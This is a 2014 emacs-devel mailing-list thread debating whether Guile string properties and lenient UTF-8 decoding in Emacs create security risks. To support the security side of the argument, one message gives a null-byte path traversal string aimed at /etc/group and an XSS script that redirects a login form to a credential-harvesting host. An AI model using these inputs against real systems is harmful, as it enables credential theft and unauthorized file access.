* Re: Emacs Lisp's future 2014-10-08 3:07 ` David Kastrup @ 2014-10-09 3:06 ` Stephen J. Turnbull 2014-10-09 3:44 ` David Kastrup 2014-10-10 14:23 ` Richard Stallman 0 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-09 3:06 UTC (permalink / raw) To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz David Kastrup writes: > Newsflash: Emacs 19 has been released in the mean time. That's good > since we have an example we can study now with regard to the problems > text properties may cause. Newsflash: we're not talking about text properties in Emacs, which has historically been hostile to both embedding in other apps and to FFIs, and is not normally used as a network daemon, but instead is usually controlled by the user who owns the resources Emacs manipulates, and in most cases has little malice toward himself. We're talking about text properties in Guile, which is designed for embedding and and extension (including wrapping foreign functions). A Guile with text properties hasn't been written, let alone released AFAIK. I dunno about the "network daemon" part, but Mark mentioned that as a target application area for Guile. It would be "nice" and "efficient" for Guile to implement properties natively so that Emacs could just use those, but Mark is correct to worry that those properties would be used to bypass validation modules written for pre-property Guile versions. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 3:06 ` Stephen J. Turnbull @ 2014-10-09 3:44 ` David Kastrup 2014-10-09 7:16 ` Stephen J. Turnbull 2014-10-10 14:23 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-09 3:44 UTC (permalink / raw) To: Stephen J. Turnbull Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz "Stephen J. Turnbull" <stephen@xemacs.org> writes: > David Kastrup writes: > > > Newsflash: Emacs 19 has been released in the mean time. That's good > > since we have an example we can study now with regard to the problems > > text properties may cause. > > Newsflash: we're not talking about text properties in Emacs, which has > historically been hostile to both embedding in other apps and to FFIs, > and is not normally used as a network daemon, It is used as a network application (I mean, what else to use as news and mail reader?). There are currently discussions on the list about the way to do TLS in a secure manner. > We're talking about text properties in Guile, which is designed for > embedding and and extension (including wrapping foreign functions). A > Guile with text properties hasn't been written, let alone released > AFAIK. I dunno about the "network daemon" part, but Mark mentioned > that as a target application area for Guile. Text properties are not in files or network streams. They will not magically materialize and cause trouble. > It would be "nice" and "efficient" for Guile to implement properties > natively so that Emacs could just use those, but Mark is correct to > worry that those properties would be used to bypass validation modules > written for pre-property Guile versions. Sigh. At any rate, this is basically a non-issue since GUILE is perfectly capable of supporting custom extensible string type stacks on the existing commands like it provides a custom extensible numeric type stack. Its object programming system GOOPS has been designed for that sort of extensibility. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 3:44 ` David Kastrup @ 2014-10-09 7:16 ` Stephen J. Turnbull 2014-10-09 7:47 ` Eli Zaretskii 0 siblings, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-09 7:16 UTC (permalink / raw) To: David Kastrup; +Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz David Kastrup writes: > "Stephen J. Turnbull" <stephen@xemacs.org> writes: > > Newsflash: we're not talking about text properties in Emacs, which has > > historically been hostile to both embedding in other apps and to FFIs, > > and is not normally used as a network daemon, > > It is used as a network application (I mean, what else to use as news > and mail reader?). There are currently discussions on the list about > the way to do TLS in a secure manner. That's simply nonsense as an argument here. Until you demonstrate at least a shred of understanding of something as fundamental as the differences in security requirements and attack surfaces of network *servers* and network *clients*, there's no point in discussing your statements further. > Text properties are not in files or network streams. They will not > magically materialize and cause trouble. "Magically", no. "Maliciously", yes, we do have to worry about that. Again, your evident ignorance of network threat models and their historical realizations (both as "theoretical" CVEs and as successful exploits) is appalling. > Sigh. At any rate, this is basically a non-issue since GUILE is > perfectly capable of supporting custom extensible string type stacks on > the existing commands Aha, a convert! (Yes, I said that already in different terms.) ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 7:16 ` Stephen J. Turnbull @ 2014-10-09 7:47 ` Eli Zaretskii 2014-10-09 10:20 ` Stephen J. Turnbull 0 siblings, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-09 7:47 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier > From: "Stephen J. Turnbull" <stephen@xemacs.org> > Date: Thu, 09 Oct 2014 16:16:04 +0900 > Cc: rms@gnu.org, mhw@netris.org, dmantipov@yandex.ru, emacs-devel@gnu.org, > handa@gnu.org, monnier@iro.umontreal.ca, eliz@gnu.org > > Until you demonstrate at least a shred of understanding of something > as fundamental as the differences in security requirements and > attack surfaces of network *servers* and network *clients*, there's > no point in discussing your statements further. This kind of "argument" will get you no points here, cf Ian Grant. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 7:47 ` Eli Zaretskii @ 2014-10-09 10:20 ` Stephen J. Turnbull 0 siblings, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-09 10:20 UTC (permalink / raw) To: Eli Zaretskii; +Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier Eli Zaretskii writes: > This kind of "argument" will get you no points here, cf Ian Grant. It's not an argument, it's an explanation of why I'm leaving the conversation. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 3:06 ` Stephen J. Turnbull 2014-10-09 3:44 ` David Kastrup @ 2014-10-10 14:23 ` Richard Stallman 1 sibling, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-10 14:23 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] It would be "nice" and "efficient" for Guile to implement properties natively so that Emacs could just use those, but Mark is correct to worry that those properties would be used to bypass validation modules written for pre-property Guile versions. You keep claiming that is correct while presenting no evidence it is correct. Put up or shut up. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-08 2:09 ` Stephen J. Turnbull 2014-10-08 3:07 ` David Kastrup @ 2014-10-09 1:19 ` Richard Stallman 2014-10-09 3:56 ` Stephen J. Turnbull 1 sibling, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-09 1:19 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] I just want to make sure that Emacs developers in general are aware that if string properties are added to Guile itself, Emacs will be a potential vector for attacks. If you demonstrate that this claim is valid, I will be concerned. For example, by providing a "back channel" for malicious information So what? How would this affect what anyone can do? There are many other channels to communicate data from one part of a Scheme program to another, so how would this additional channel make a practical difference? Why object to adding a window in a wall that has so many doorways already? If you show me that there is some real and useful form of security, which adding string property lists would break, you could convince me that there is a real issue of security here. What I advocate is that string properties should be implemented by using Guile facilities for defining types, not by changing Guile. It would be a pain in the neck if Emacs strings were something different from Guile strings. If you want to argue that security justifies this pain, you need to show it is real security and really does a useful job. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 1:19 ` Richard Stallman @ 2014-10-09 3:56 ` Stephen J. Turnbull 2014-10-09 4:49 ` Mike Gerwitz 2014-10-10 14:23 ` Richard Stallman 0 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-09 3:56 UTC (permalink / raw) To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz Richard Stallman writes: > If you demonstrate that this claim is valid, I will be concerned. *sigh* Be unconcerned. The world is a *lot* more hostile today than it was in the days when you posted your passwords on the 'net. > It would be a pain in the neck if Emacs strings were something > different from Guile strings. Sure. Security comes at cost. That's part of why credit cards charge a minumum of 5% over prime rate, and why people lose hundreds of millions of dollars a year to Internet scams: somebody didn't want to pay that cost, so imposed the risk on others. The risk is almost invisiblly small in a monolithic Emacs, it's true. But a Guile-based Emacs is no longer monolithic. It becomes a component directly connected to a much larger system of Guile modules, whose purposes and uses the Emacs developers do not know. Evidently some leading Emacs developers are unwilling to care at all about those unknown purposes and use cases. If I were a Guile maintainer, I would be concerned about adding features requested by Emacs. > If you want to argue that security justifies this pain, Sorry, no. If you want to use a Guile maintained by Mark, you're going to have to convince him that the benefits of having Guile implement string properties natively (rather than in the Emacs module running on top of Guile) is worth overriding his justified paranoia. I'm trying to convince you and other Emacs developers that you're going to have to be more sympathetic to security if you want to get such features into Guile. > you need to show it is real security and really does a useful job. I suspect I can't give you a convincing example, because I haven't studied the Guile modules "at risk", and in any case, most real risks would require Guile modules that take advantage of text properties (of which there are obviously none) or an Emacs -> Guile security code -> Emacs passage, where the second Emacs instance "trusts" the code because the Guile security code has validated it, but that's not possible yet either. However, here are a couple of analogies. Even a feature as simple as ".." representing the parent directory has been used in disastrous network breakins. The danger of ".." is obvious in retrospect, but the developers of web servers (several) were taken unaware because they used system calls to traverse paths, and those calls authomatically implemented "..". Sensitive user data (such as password files) was leaked. Or how about the recent bash lossage? s-expressions are just Lisp data, and could be placed in a property. Older security code that does not validate properties might pass arbitrary code (because it doesn't look at it) to a module that expects to receive a symbol, eval's it, and voila! you're owned, just as any CGI implemented as a shell script on a host where /bin/sh is a symlink to bash can own you. Evaluating functions stored in environment variables is not a POSIX sh feature; if bash's "sh compatibility" mode actually implemented compatibility, this exploit would be impossible. AFAIK setting POSIX_ME_HARDER doesn't help. So there you are. That's the best I can do. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 3:56 ` Stephen J. Turnbull @ 2014-10-09 4:49 ` Mike Gerwitz 2014-10-09 8:00 ` Eli Zaretskii 2014-10-10 14:23 ` Richard Stallman 2014-10-10 14:23 ` Richard Stallman 1 sibling, 2 replies; 404+ messages in thread From: Mike Gerwitz @ 2014-10-09 4:49 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier, eliz [-- Attachment #1: Type: text/plain, Size: 3312 bytes --] On Thu, Oct 09, 2014 at 12:56:42PM +0900, Stephen J. Turnbull wrote: > Richard Stallman writes: > > > If you demonstrate that this claim is valid, I will be concerned. > > *sigh* Be unconcerned. The world is a *lot* more hostile today than > it was in the days when you posted your passwords on the 'net. Agreed. Character encoding attacks are also something that has been exploited "in the wild". Some examples include: - UTF-7 character encoding to bypass filters[0] (e.g. for XSS); - IIS WebDAV validation exploit (CVE-2009-1535);[1] and - CAPEC-80: Using UTF-8 Encoding to Bypass Validation Logic;[2] and - Google's XSS vulnerability, related to the first item in this list.[3] Note that not all of the above may be applicable to the specifics of this discussion---the point is to convey, generally, that character encoding poses serious threats when improperly handled. Though this discussion seems to be about what is "improper". See "Secure Programming for Linux [sic] and Unix HOWTO".[4] The Unicode Consortium also has a security report[5] that mentions, among other import concepts, deletion of code points and handling of "illegal" input byte sequences. With regards to passing raw input to other systems: this isn't necessarily Unicode related (unless an invalid sequence contains a null byte), but serves to illustrate the point that Mark is trying to make: there is a well-known issue in PHP whereby passing a null byte as a parameter to a script (e.g. via HTTP GET/POST) opens up a number of attacks. Specifically, PHP handles null bytes in strings (by storing the string length as part of the struct that holds the string). However, it makes calls directly to libc. So, if an unvalidated input $foo contains "../../../../etc/group\000", and PHP makes a call to `fopen' with the path "/webroot/modules/$foo/index.php", the result would be opening "/webroot/modules/../../../../etc/group". I have the most experience developing web applications, where character encoding exploits are common.[6] > So there you are. That's the best I can do. I can dig up more examples, but hopefully some of these help to illustrate the severity of ignoring character encoding concerns. * * * Aside: For those who don't know what XSS is: the issue is that, if input from the user is not properly validated/filtered, and is at some point output back to a user, that output could be interpreted as HTML, JavaScript, CSS, etc. So if XSS filters are bypassed using the aforementioned methods, perhaps the user will output `<script>document.forms[0].action = "http://login-harvester.foo";</script>', which might change a login form, say, to post user credentials to a remote website. [0]: http://en.wikipedia.org/wiki/UTF-7#Security [1]: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1535 [2]: https://capec.mitre.org/data/definitions/80.html [3]: http://shiflett.org/blog/2005/dec/googles-xss-vulnerability [4]: http://www.tldp.org/HOWTO/Secure-Programs-HOWTO/character-encoding.html [5]: http://www.unicode.org/reports/tr36/ [6]: https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet -- Mike Gerwitz Free Software Hacker | GNU Maintainer http://mikegerwitz.com FSF Member #5804 | GPG Key ID: 0x8EE30EAB [-- Attachment #2: Digital signature --] [-- Type: application/pgp-signature, Size: 836 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 4:49 ` Mike Gerwitz @ 2014-10-09 8:00 ` Eli Zaretskii 2014-10-09 10:50 ` Stephen J. Turnbull 2014-10-10 14:23 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-09 8:00 UTC (permalink / raw) To: Mike Gerwitz Cc: dak, rms, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Thu, 9 Oct 2014 00:49:17 -0400 > From: Mike Gerwitz <mikegerwitz@gnu.org> > Cc: rms@gnu.org, dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru, > emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca, > eliz@gnu.org > > On Thu, Oct 09, 2014 at 12:56:42PM +0900, Stephen J. Turnbull wrote: > > Richard Stallman writes: > > > > > If you demonstrate that this claim is valid, I will be concerned. > > > > *sigh* Be unconcerned. The world is a *lot* more hostile today than > > it was in the days when you posted your passwords on the 'net. > > Agreed. Character encoding attacks are also something that has been > exploited "in the wild". Some examples include: > > - UTF-7 character encoding to bypass filters[0] (e.g. for XSS); > - IIS WebDAV validation exploit (CVE-2009-1535);[1] and > - CAPEC-80: Using UTF-8 Encoding to Bypass Validation Logic;[2] and > - Google's XSS vulnerability, related to the first item in this list.[3] > > Note that not all of the above may be applicable to the specifics of this > discussion---the point is to convey, generally, that character encoding > poses serious threats when improperly handled. Though this discussion seems > to be about what is "improper". Aren't you again confusing the application level with the lower "engine" level? Applications, which do interpret the text, should indeed be aware of these issues. (For the purposes of this discussion, "application" means Lisp code that processes text, or presents it to the user, or acts according to user responses.) But the "engine" must be able to handle raw bytes, including invalid UTF-8 sequences, unless told otherwise. Any other default will unduly punish the innocent majority on behalf of the evil minority. > With regards to passing raw input to other systems: this isn't necessarily > Unicode related (unless an invalid sequence contains a null byte), but > serves to illustrate the point that Mark is trying to make: there is a > well-known issue in PHP whereby passing a null byte as a parameter to a > script (e.g. via HTTP GET/POST) opens up a number of attacks. Specifically, > PHP handles null bytes in strings (by storing the string length as part of > the struct that holds the string). However, it makes calls directly to libc. > So, if an unvalidated input $foo contains "../../../../etc/group\000", and > PHP makes a call to `fopen' with the path "/webroot/modules/$foo/index.php", > the result would be opening "/webroot/modules/../../../../etc/group". So what would you have Emacs do when I'm editing a file with binary nulls: ask me for each save whether I really mean it, and lecture me about possible security implications? The encoding routines have no idea whether they are encoding a PHP script, much less whether it will be sent via HTTP. > I can dig up more examples, but hopefully some of these help to illustrate > the severity of ignoring character encoding concerns. Please do, but (a) please make the examples be relevant to what Emacs does with decoding and encoding external bytestreams, and (b) please suggest what you think Emacs should do in those cases instead of what it does now. Otherwise, this discussion is much less constructive than it could be, because our concerns are with how the discussed issues will or should affect Emacs. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 8:00 ` Eli Zaretskii @ 2014-10-09 10:50 ` Stephen J. Turnbull 2014-10-09 11:06 ` David Kastrup 2014-10-09 11:27 ` Eli Zaretskii 0 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-09 10:50 UTC (permalink / raw) To: Eli Zaretskii Cc: dak, rms, handa, mhw, dmantipov, emacs-devel, Mike Gerwitz, monnier Eli Zaretskii writes: > Aren't you again confusing the application level with the lower > "engine" level? No, you and David are confused. All experience with programming systems shows that if you leave security up to the application programmers, you won't get enough. Remember, the security of a system is equal to the minimum of the security levels of its components. Of course the engine level needs to provide the *option* to be flexible. But that flexibility must be opt-in for the applications that need to be nonconformant, not opt-out for the applications that are happy to conform. The latter won't bother ("it's too much to type"). In the case of Emacs coding systems, it's as simple as choosing to name the conformant coding system 'utf-8, and the non-conformant one 'utf-8-with-rawbytes. Why does this excite such <adjective deleted> opposition? ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 10:50 ` Stephen J. Turnbull @ 2014-10-09 11:06 ` David Kastrup 2014-10-09 17:23 ` Richard Stallman 2014-10-09 11:27 ` Eli Zaretskii 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-09 11:06 UTC (permalink / raw) To: Stephen J. Turnbull Cc: rms, handa, mhw, dmantipov, emacs-devel, Mike Gerwitz, monnier, Eli Zaretskii "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Eli Zaretskii writes: > > > Aren't you again confusing the application level with the lower > > "engine" level? > > No, you and David are confused. All experience with programming > systems shows that if you leave security up to the application > programmers, you won't get enough. Remember, the security of a system > is equal to the minimum of the security levels of its components. Annoying and distracting the application programmer is not providing additional security. It's security theatre. > In the case of Emacs coding systems, it's as simple as choosing to > name the conformant coding system 'utf-8, and the non-conformant one > 'utf-8-with-rawbytes. Why does this excite such <adjective deleted> > opposition? So first I let the locale and other mechanisms choose an encoding, then try getting at its choice of coding system before any prompts appear, then I convert the symbol to a string, check whether the string ends with "-with-rawbytes" and append it if needed (let's hope it is in the right location with regard to "-dos" or "-unix" endings) and lo-and-behold, I am allowed to read a file. Or network connection. Or console output. If I don't get that, either my control flow will be affected, or I will receive falsified data not corresponding to the input that I can't even check for bad bytes and for which I am unable to figure out byte offsets of various parts in the input because I can no longer reconstruct the input faithfully. "Stuff refuses to work" will lose you more users than "stuff refuses to secondguess". Stuff like PostScript files are text files with occasional binary sections. That's real-world data and dealing with it should not require preannouncing it every time explicitly. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 11:06 ` David Kastrup @ 2014-10-09 17:23 ` Richard Stallman 2014-10-09 17:37 ` Eli Zaretskii 0 siblings, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-09 17:23 UTC (permalink / raw) To: David Kastrup Cc: mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen, eliz [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] So first I let the locale and other mechanisms choose an encoding, then try getting at its choice of coding system before any prompts appear, then I convert the symbol to a string, check whether the string ends with "-with-rawbytes" and append it if needed Is that really a likely scenario? I expect that a program, doing some non-editing job involving a network connection, ought to specify a fixed coding system in accord with the protocol it is communicating with. If there are programs that want to heuristically select coding systems for purposes other than reading files, and want to allow raw bytes when UTF-8 is selected, we can easily accommodate them by providing a way to say, "If the heuristics say this is utf-8, use the coding system utf-8-raw-bytes." -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 17:23 ` Richard Stallman @ 2014-10-09 17:37 ` Eli Zaretskii 2014-10-12 3:24 ` Richard Stallman 0 siblings, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-09 17:37 UTC (permalink / raw) To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Thu, 09 Oct 2014 13:23:43 -0400 > From: Richard Stallman <rms@gnu.org> > CC: stephen@xemacs.org, handa@gnu.org, mhw@netris.org, > dmantipov@yandex.ru, emacs-devel@gnu.org, mikegerwitz@gnu.org, > monnier@iro.umontreal.ca, eliz@gnu.org > > So first I let the locale and other mechanisms choose an encoding, then > try getting at its choice of coding system before any prompts appear, > then I convert the symbol to a string, check whether the string ends > with "-with-rawbytes" and append it if needed > > Is that really a likely scenario? It is what happens with all our general-purpose commands and APIs that invoke subprocesses, like shell-command, shell-command-on-region, start-process, etc. The default is to use the locale-specific encoding, and users, of course, are not required to type any specific coding systems when they invoke those commands/functions. > I expect that a program, doing some non-editing job involving a > network connection, ought to specify a fixed coding system in accord > with the protocol it is communicating with. The protocols rarely specify encoding, AFAIK. If they do, we do use them, e.g., when decoding an email message that specifies its MIME charset. But that comes _after_ we already have read the mail into a buffer in its raw undecoded form. And, of course, when you invoke a program locally, there's usually no protocol at all involved. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 17:37 ` Eli Zaretskii @ 2014-10-12 3:24 ` Richard Stallman 2014-10-12 5:54 ` Eli Zaretskii 0 siblings, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-10-12 3:24 UTC (permalink / raw) To: Eli Zaretskii Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] The protocols rarely specify encoding, AFAIK. If they do, we do use them, e.g., when decoding an email message that specifies its MIME charset. But that comes _after_ we already have read the mail into a buffer in its raw undecoded form. There is no problem in that case. You read it with raw-text, you determine which encoding to decode, then you decode that one. What is an example of a protocol that doesn't specify an encoding? We need to look at some real cases to see what is the right way to handle them. When we look at enough cases to see a pattern, then we could come up with a general rule.x And, of course, when you invoke a program locally, there's usually no protocol at all involved. Likewise, we need to look at some real cases. You can invoke any program with M-!; I think in that case heuristic decoding is what users want. When functions run call-process on specific, what decoding is really right? -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 3:24 ` Richard Stallman @ 2014-10-12 5:54 ` Eli Zaretskii 2014-10-13 3:10 ` Richard Stallman 2014-10-13 3:46 ` Richard Stallman 0 siblings, 2 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-12 5:54 UTC (permalink / raw) To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen > Date: Sat, 11 Oct 2014 23:24:30 -0400 > From: Richard Stallman <rms@gnu.org> > CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org, > dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org, > monnier@iro.umontreal.ca, stephen@xemacs.org > > What is an example of a protocol that doesn't specify an encoding? I'm not an expert, so I actually have trouble coming up with protocols that _do_ specify an encoding. Maybe someone else could help out. > And, of course, when you invoke a program locally, there's usually no > protocol at all involved. > > Likewise, we need to look at some real cases. Not sure what you mean by that. M-! and M-| is what I had in mind. > You can invoke any program with M-!; I think in that case heuristic > decoding is what users want. But that's about 99.99% of the uses. So perhaps we are in violent agreement after all. > When functions run call-process on specific, what decoding is really > right? I don't think there's a way to know that, except in a very few specific cases (like speller, for example). We currently use an encoding derived from the user locale, but that's a heuristics that has known limitations and known use cases where it simply fails (but no better guess is available). ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 5:54 ` Eli Zaretskii @ 2014-10-13 3:10 ` Richard Stallman 2014-10-13 5:35 ` Stephen J. Turnbull 2014-10-13 5:43 ` Eli Zaretskii 2014-10-13 3:46 ` Richard Stallman 1 sibling, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-13 3:10 UTC (permalink / raw) To: Eli Zaretskii Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > And, of course, when you invoke a program locally, there's usually no > protocol at all involved. > > Likewise, we need to look at some real cases. Not sure what you mean by that. M-! and M-| is what I had in mind. This may be a big miscommunication. I think the people who want strict encoding are talking about network communication using open-network-stream. But it would be good if they presented some examples to make it clear what cases they are talking about. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 3:10 ` Richard Stallman @ 2014-10-13 5:35 ` Stephen J. Turnbull 2014-10-13 6:02 ` Eli Zaretskii ` (2 more replies) 2014-10-13 5:43 ` Eli Zaretskii 1 sibling, 3 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-13 5:35 UTC (permalink / raw) To: rms Cc: dak, handa, mhw, dmantipov, emacs-devel, mikegerwitz, monnier, Eli Zaretskii Richard Stallman writes: > I think the people who want strict encoding are talking about > network communication using open-network-stream. Speaking only for myself, no, I mean all octet streams purported to be encoded text, network or local. Network streams can only be considered safe in very carefully maintained environments, so the risks are greatest there. But there's no such thing as a truly local stream, since any given stream may be a file downloaded from the network or provided by an application of uncertain provenance. There are three cases of interest, AFAICS: (1) The file or application is truly local, provided with the OS or created by the user. In that case on a well-maintained system, the encoding should be valid, as you pointed out elsewhere. Therefore a strict policy should be transparent. (See (3) for what I believe to be the main class of exceptions.) (2) The file or application was downloaded from the network. Emacs cannot know the provenance, and so the same care should be taken as with a network stream. (3) The application is trustworthy, but produces invalid encoded text in some well-understood situations. In this case the Lisp program should be allowed to opt out of default validation and provide its own. Preferably only in the specific situations rather than globally. An example of (3) is David's case, with AUCTeX handling of TeX error messages containing non-unibyte text.) AFAIK such applications are quite rare nowadays. TeX is a special case because it is one of the few applications whose behavior is specified extremely precisely but in an encoding-oblivious way.[1] As an example of special validation in (3), AIUI in TeX error messages, only a very few leading and trailing bytes of quoted source text should be invalid. Thus the rest should be valid, and the user probably should be notified of unexpected rawbytes. (That's up to the Lisp programmer, of course. Still I think such flexible validation is in the user's interest if the programmer is willing to provide it.) I am unaware of other large classes of exceptional cases in modern GNU/Linux systems, or the major proprietary OSes. I understand David and Eli to be of the opinion that in practice there is insignificant risk to Emacs or its users from any form of invalid or malicious input, from the network or local. I disagree. Footnotes: [1] I'm referring to the TRIP test. This specification effectively assumes a unibyte encoding, and so it is likely to be very difficult to create a TeX implementation that handles Unicode conformant to the standard *and* passes TRIP. I'll take a TeX that passes TRIP any day! ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-13 5:35 ` Stephen J. Turnbull @ 2014-10-13 6:02 ` Eli Zaretskii 2014-10-13 8:24 ` Stephen J. Turnbull 2014-10-13 14:55 ` Paul Eggert 2014-10-14 2:11 ` Richard Stallman 2 siblings, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-10-13 6:02 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, rms, handa, mhw, dmantipov, emacs-devel, mikegerwitz, monnier > From: "Stephen J. Turnbull" <stephen@xemacs.org> > Cc: Eli Zaretskii <eliz@gnu.org>, > dak@gnu.org, > mikegerwitz@gnu.org, > mhw@netris.org, > dmantipov@yandex.ru, > emacs-devel@gnu.org, > handa@gnu.org, > monnier@iro.umontreal.ca > Date: Mon, 13 Oct 2014 14:35:02 +0900 > > (1) The file or application is truly local, provided with the OS or > created by the user. In that case on a well-maintained system, > the encoding should be valid, as you pointed out elsewhere. > Therefore a strict policy should be transparent. (See (3) for > what I believe to be the main class of exceptions.) > > (2) The file or application was downloaded from the network. Emacs > cannot know the provenance, and so the same care should be taken > as with a network stream. > > (3) The application is trustworthy, but produces invalid encoded text > in some well-understood situations. In this case the Lisp program > should be allowed to opt out of default validation and provide its > own. Preferably only in the specific situations rather than > globally. There's also the case that the application was invoked on a remote host, and its output is passed via the network (a.k.a. "Tramp"). Not sure if those 3 cases cover that. > An example of (3) is David's case, with AUCTeX handling of TeX error > messages containing non-unibyte text.) AFAIK such applications are > quite rare nowadays. "Rare" doesn't mean unimportant to users to the degree we can ignore them. If we do want to cater to those "rare" cases, the only way of doing that is maintain a database of programs and their behaviors. We don't have that now, and I'm not sure how practical this could be, and what kind of maintenance burden it would require to keep the database up to date. Moreover, I don't think case (1) is as easy as you seem to think. The current Emacs policy is to use the locale-specific encoding, but that is just a heuristic that could easily be false, as modern distributed network-based computing doesn't lend itself well to the notion of a fixed locale with a single encoding. In many cases, a file or a program that you think are "local" really aren't. > I understand David and Eli to be of the opinion that in practice there > is insignificant risk to Emacs or its users from any form of invalid > or malicious input, from the network or local. I disagree. I never said anything like that. I simply don't have the expertise to assess the real amount of risk associated with this particular aspect of Emacs. All I can cite is my own experience. What I did say, and stand by, is that doing what you suggest is certain to cause user outcry of the kind I remember very well. I think it's naive to assume that "this time it will be different"; experience has taught me that this attitude is ill-advised. Therefore, I think Emacs should only go to the kind of strict defaults you propose if _users_ demand that, or if real-life Emacs use stories show up that demonstrate the actual danger from using the current default. We shouldn't do that out of our own initiative based on academic considerations and examples from PHP or whatever. 